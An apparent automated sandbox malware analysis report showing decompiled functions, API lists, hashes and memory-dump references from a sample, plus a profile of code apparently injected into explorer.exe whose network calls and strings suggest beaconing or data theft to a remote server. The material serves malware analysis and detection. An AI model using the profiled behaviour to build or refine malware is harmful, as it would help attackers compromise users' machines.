				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0094EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0094EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0094685D(_t167, 4) == 0) {
								if(E0094685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0094685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0094685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00928980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0091DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0094EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0094EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0094fcd1
0x0094fcd6
0x0094fcd9
0x0094fcdc
0x0094fcdf
0x0094fce2
0x0094fce5
0x0094fce8
0x0094fceb
0x0094fced
0x0094fced
0x0094fcf3
0x00000000
0x00000000
0x0094fcfc
0x0094fcfe
0x0094fdc1
0x0097ecbd
0x00000000
0x0097eccc
0x0097eccc
0x0097ecd2
0x00000000
0x00000000
0x0097ecdf
0x0097ece0
0x0097ece4
0x0097eceb
0x0097ecee
0x0097eca8
0x0097eca8
0x0097ecaa
0x0094fd76
0x0094fd79
0x0094fdb4
0x0094fdb5
0x0094fdb6
0x00000000
0x0094fdb6
0x0094fd7e
0x0097ecfc
0x0094fe2f
0x00000000
0x0094fe2f
0x0097ed08
0x0097ed0f
0x0097ed17
0x0097ed1b
0x00000000
0x0097ed1b
0x0094fd88
0x00000000
0x00000000
0x0094fd94
0x0094fd99
0x0094fda1
0x00000000
0x00000000
0x0094fdb0
0x00000000
0x0094fdb0
0x0097ecbd
0x0094fdc7
0x0094fdcb
0x00000000
0x0094fdd7
0x0094fde3
0x0094fe06
0x00961fe7
0x00000000
0x00000000
0x00961fef
0x00961ff0
0x00961ff4
0x00961ff7
0x00961ffa
0x00961ffd
0x00962000
0x00000000
0x00000000
0x0097ecf1
0x00000000
0x0097ecf1
0x00000000
0x0094fe06
0x0094fde8
0x0094fdec
0x0094fdef
0x0094fdf2
0x00000000
0x0094fdf2
0x0094fdcb
0x0094fd04
0x0094fd05
0x0097ec67
0x00000000
0x00000000
0x0097ec6f
0x00000000
0x0097ec6f
0x0094fd13
0x0094fd3c
0x0094fd40
0x0097ec75
0x0097ec7a
0x00000000
0x0097ec8a
0x0097ec8a
0x0097ec90
0x0097ecb2
0x0094fd73
0x0094fd73
0x00000000
0x0094fd73
0x0097ec95
0x00000000
0x00000000
0x0097eca1
0x0097eca4
0x0097eca5
0x00000000
0x0097eca5
0x0097ec7a
0x0094fd4a
0x00000000
0x0094fd6e
0x0094fd6e
0x0094fd71
0x00000000
0x0094fd71
0x0094fd4a
0x0094fd21
0x0095a3a1
0x00000000
0x0095a3a1
0x0094fd36
0x0096200b
0x00962012
0x00000000
0x00000000
0x00962018
0x00000000
0x00962018
0x00000000
0x0094fd36
0x0094fe0f
0x0094fe16
0x0095a3ad
0x00000000
0x00000000
0x0095a3b3
0x0095a3b3
0x0094fe1f
0x0097ed25
0x0097ed86
0x00000000
0x00000000
0x0097ed91
0x0097ed95
0x0097ed95
0x0097ed9a
0x0097edad
0x0097edb3
0x0097edba
0x0097edc4
0x0097edc9
0x00000000
0x0097edcc
0x0097ed2a
0x0097ed55
0x00000000
0x00000000
0x0097ed61
0x0097ed66
0x0097ed6e
0x00000000
0x00000000
0x0097ed7d
0x00000000
0x0097ed7d
0x0097ed30
0x00000000
0x00000000
0x0097ed3c
0x0097ed43
0x0097ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0094FD94

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: c5c6ff21687514e1d96d00d2caf9acf8297ec8c698c99a0c8ac3dff7d0cc2a40
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: A2919172D0021AEFDF24CF59C855AAFB7B8FF55309F24847AD445A72A2E7304A41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012C1673, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E012C1673(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				void* __edi;
				signed int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				void* _t57;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					_push(_t57);
					E012B7857( &_v20, _t57, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E012C124B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t28 = _v20 + 4; // 0x20432f41
							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E012B8EFF(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0x3a202020
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0x3a202020
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0x3a202020
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0x3a202020
						_t18 = _t59 + 4; // 0x20432f41
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 012C16A7
__isleadbyte_l.LIBCMT ref: 012C16D5
MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,012CFF04,?,00000000), ref: 012C1703
MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,012CFF04,?,00000000), ref: 012C1739

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 1cc21933f5f2fef1fc90ee615b4fc6cd8859e72768d01b18b8df8a3a8f7044b3
Instruction ID: 9bfb3530cd68e6c6989e765b98217ba069f8bf745d35a02deb2d37514ef1c708
Opcode Fuzzy Hash: 1cc21933f5f2fef1fc90ee615b4fc6cd8859e72768d01b18b8df8a3a8f7044b3
Instruction Fuzzy Hash: DA31D230620217EFEB258E28CC46BBA7FA5FF41A50F29861CE72487192D730D464DB90

Uniqueness

Uniqueness Score: -1.00%

Function 012BECB1, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BECB1(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E012BF1FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E012BED37(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E012BF473(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E012BF3B4(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 012BECD5

Part of subcall function 012BF3B4: __fltout2.LIBCMT ref: 012BF3DD

__cftog_l.LIBCMT ref: 012BECFB
__cftoe_l.LIBCMT ref: 012BED2D

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 200fe126f77aae2c1e368de3d0c9dbe5e8f696b565085107dcdb4290603baf7d
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 9601483246014BBBCF125E88CC818EE3F2ABB19394B5A8915FB1858131C276C9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 012BCC10, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E012BCC10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x12cd9a0);
				E012B9160(__ebx, __edi, __esi);
				_t31 = E012BD59F(__edx, __edi, _t35);
				_t25 =  *0x12d1c6c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E012BBE5F(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x12d1524; // 0x12d1820
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x12d1820;
								if(__eflags != 0) {
									E012B8F53(_t33);
								}
							}
						}
						_t20 =  *0x12d1524; // 0x12d1820
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x12d1524; // 0x12d1820
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E012BCCAC();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E012B751F(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E012B91A5(_t33);
			}

APIs

Part of subcall function 012BD59F: __getptd_noexit.LIBCMT ref: 012BD5A0

__lock.LIBCMT ref: 012BCC4D
InterlockedDecrement.KERNEL32(?), ref: 012BCC6A
_free.LIBCMT ref: 012BCC7D
InterlockedIncrement.KERNEL32(012D1820), ref: 012BCC95

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 8a1bbf6fb96579d8c4058d2cb02b8dcab98937fd89ff1be36d1033a6b900d3f9
Instruction ID: f3134bc16a7af7d3f147e116beef5030c321506f2ff80aa1f6fd72fe7babe5f8
Opcode Fuzzy Hash: 8a1bbf6fb96579d8c4058d2cb02b8dcab98937fd89ff1be36d1033a6b900d3f9
Instruction Fuzzy Hash: 1C01D232D21A139BEB25AB69F4C83EE77A0BF65790F098009EB1467680C7346961CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 012B1B30, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E012B1B30(intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v45;
				short _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v64;
				intOrPtr _v68;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v92;
				char _v167;
				char _v168;
				signed int _t163;
				signed int _t177;
				signed int _t178;
				void* _t186;
				intOrPtr _t189;
				void* _t292;
				void* _t293;
				void* _t294;

				_v64 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v45 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v168 = 0;
				_t163 = E012B87A0( &_v167, 0, 0x31);
				_t294 = _t293 + 0xc;
				asm("cvttsd2si eax, [ebp+0x8]");
				_v16 = _t163;
				asm("cdq");
				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
				asm("cdq");
				_v16 = _v16 / 0x3e8;
				_v8 = 4;
				while(_v8 >= 0) {
					asm("cdq");
					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
					asm("cdq");
					_v16 = _v16 / 0x64;
					_v8 = _v8 - 1;
				}
				_v36 =  *(_t292 + 0xffffffffffffffa4);
				asm("cdq");
				_v20 = _v36 / 0x64;
				asm("cdq");
				_v12 = _v36 % 0x64;
				asm("cdq");
				_v40 = _v12 / 0xa;
				_t177 = _v12;
				asm("cdq");
				_t178 = _t177 / 0xa;
				_v44 = _t177 % 0xa;
				if(_v12 >= 0x14 || _v20 == 0) {
					if(_v12 >= 0x14 || _v20 != 0) {
						if(_v12 <= 0x14 || _v20 == 0) {
							E012B1E50(_t178, _v40,  &_v92);
							E012B1E40( &_v32, _v44,  &_v32);
							E012B8140( &_v64,  &_v32);
							_t294 = _t294 + 8;
						} else {
							E012B1E40(_v20, _v20,  &_v32);
							E012B8140( &_v64, "Hundred ");
							E012B1E50(_v40, _v40,  &_v92);
							E012B8140( &_v64,  &_v92);
							E012B1E40( &_v32, _v44,  &_v32);
							E012B8140( &_v64,  &_v32);
							_t294 = _t294 + 0x18;
						}
					} else {
						E012B1E40( &_v32, _v12,  &_v32);
					}
				} else {
					E012B1E40(_v20, _v20,  &_v32);
					E012B8140( &_v64, "Hundred ");
					E012B1E40(_v12, _v12,  &_v32);
					E012B8140( &_v64,  &_v32);
					_t294 = _t294 + 0x10;
				}
				_v8 = 4;
				while(_v8 >= 0) {
					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
						asm("cdq");
						E012B1E50( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
						asm("cdq");
						E012B1E40( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
						E012B8140(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
						_t294 = _t294 + 8;
					} else {
						E012B1E40( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
					}
					_v8 = _v8 - 1;
				}
				_v8 = 0;
				while(_v8 < 5) {
					_t189 = E012B82C0(_t292 + _v8 * 0x1e - 0x13c);
					_t294 = _t294 + 4;
					_v68 = _t189;
					if(_v68 != 0) {
						E012B8140( &_v168, _t292 + _v8 * 0x1e - 0x13c);
						E012B8140( &_v168,  &_v80);
						_t294 = _t294 + 0x10;
					}
					_v8 = _v8 + 1;
				}
				E012B8140(_a12,  &_v64);
				_t186 = E012B82C0(_a12);
				 *((char*)(_a12 + _t186 - 1)) = 0;
				return _t186;
			}

APIs

_memset.LIBCMT ref: 012B1B73

Strings

Hundred , xrefs: 012B1C42
Hundred , xrefs: 012B1CAC

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID: Hundred $Hundred
API String ID: 2102423945-1478457770
Opcode ID: 5d5d6be37350d0da5fefd9303027d68eddafa4a6ea3acf74b936c53bfb2d96d9
Instruction ID: a95f569d733780c1394ca96ddc0f86644ff1d241387b56324c4d2bb4da8a0539
Opcode Fuzzy Hash: 5d5d6be37350d0da5fefd9303027d68eddafa4a6ea3acf74b936c53bfb2d96d9
Instruction Fuzzy Hash: 40A172B1D20209EBCF04DFE8E8D1BEDB7B9BF98340F148569E115A7240EB749A15CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012BF71C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E012BF71C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr* _v20;
				void* _t4;
				intOrPtr* _t7;
				intOrPtr _t9;

				_t15 = __edx;
				_t13 = __ebx;
				_t4 = E012C3C1F(0, 0x10000, 0x30000);
				if(_t4 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E012B8B87(__ebx, __edx);
					asm("int3");
					_t7 =  *_v20;
					__eflags =  *_t7 - 0xe06d7363;
					if( *_t7 != 0xe06d7363) {
						L9:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
							goto L9;
						} else {
							_t9 =  *((intOrPtr*)(_t7 + 0x14));
							__eflags = _t9 - 0x19930520;
							if(__eflags == 0) {
								L10:
								E012BC6A9(_t13, _t15, 0, __eflags);
								asm("int3");
								E012BC080(E012BF743);
								__eflags = 0;
								return 0;
							} else {
								__eflags = _t9 - 0x19930521;
								if(__eflags == 0) {
									goto L10;
								} else {
									__eflags = _t9 - 0x19930522;
									if(__eflags == 0) {
										goto L10;
									} else {
										__eflags = _t9 - 0x1994000;
										if(__eflags == 0) {
											goto L10;
										} else {
											goto L9;
										}
									}
								}
							}
						}
					}
				} else {
					return _t4;
				}
			}

APIs

__controlfp_s.LIBCMT ref: 012BF72A

Part of subcall function 012C3C1F: __control87.LIBCMT ref: 012C3C43

__invoke_watson.LIBCMT ref: 012BF73D

Strings

csm, xrefs: 012BF74B

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: __control87__controlfp_s__invoke_watson
String ID: csm
API String ID: 1371525046-1018135373
Opcode ID: 7382b433a52efc8e20883dbf2fcc5d6bb40b1816efec12ba127dc858bcffb2b8
Instruction ID: 374d844c8ae6afdb1c61d5461efe0c3ba4f636c65d19aae75cfeccdd7a39c2ab
Opcode Fuzzy Hash: 7382b433a52efc8e20883dbf2fcc5d6bb40b1816efec12ba127dc858bcffb2b8
Instruction Fuzzy Hash: FAF024311302071B8B2E997DAEC4AEE378D9F203D1F6445C1E708CE521DB20D691E2D7

Uniqueness

Uniqueness Score: -1.00%

Function 012B6B80, Relevance: 5.0, APIs: 4, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E012B6B80(void* __ecx) {
				void* _v8;
				void* _t5;
				void* _t7;
				void* _t14;

				_t14 = __ecx;
				_push(__ecx);
				_t5 = HeapAlloc(GetProcessHeap(), 1, 0x17d78400);
				_v8 = _t5;
				_push(_t5);
				if(_t5 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t7);
				if(_v8 != 0) {
					E012B6C50(_t14, _v8, 0x17d78400);
					_push(_t11);
					asm("cld");
					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
				}
				return _t7;
			}

0x012b6b80
0x012b6b83
0x012b6b93
0x012b6b99
0x012b6b9c
0x012b6ba0
0x012b6ba4
0x012b6ba5
0x012b6ba9
0x012b6baa
0x012b6baf
0x012b6bbd
0x012b6bc2
0x012b6bc7
0x012b6bd4
0x012b6bd4
0x012b6bde

APIs

GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6B8C
HeapAlloc.KERNEL32(00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6B93
GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6BCD
HeapAlloc.KERNEL32(00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6BD4

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 7c8816d43ad743a092902f9ac3c27bcd628631b341e382187d9150d0ee7660cf
Instruction ID: 76dd7e31ca477d03160ba92925373d1ed5be224755e95d30f5fb3b90b25a452d
Opcode Fuzzy Hash: 7c8816d43ad743a092902f9ac3c27bcd628631b341e382187d9150d0ee7660cf
Instruction Fuzzy Hash: A5F08271541618BFE71066B8BC4EFEBB7ACE705709F604554F705D3240D5725A048760

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 1388 Parent PID: 2852 explorer.exeCOMMON

Executed Functions

Function 029767A2, Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 814networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 0297694F
setsockopt.WS2_32 ref: 02977051
recv.WS2_32 ref: 0297707A

Strings

GET , xrefs: 02976B39
nnec, xrefs: 02976B4B
: cl, xrefs: 02976B59
Co, xrefs: 02976B44
&sql, xrefs: 02976C92
tion, xrefs: 02976B52
&un=, xrefs: 02976D12
dat=, xrefs: 02976AB1
&br=, xrefs: 02976D2A
ose, xrefs: 02976B60

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
Instruction ID: 16a3cabb3fbbbf849b713e8bb4d4955269ce26d4d1afadaecc850b8f68556754
Opcode Fuzzy Hash: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
Instruction Fuzzy Hash: DB526D30618B088BDB29EF68D4847EAB7E6FB94304F50492ED49BD7146EF30A549CB85

Uniqueness

Uniqueness Score: -1.00%

Function 02975A52, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 642filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL ref: 02975C69

Strings

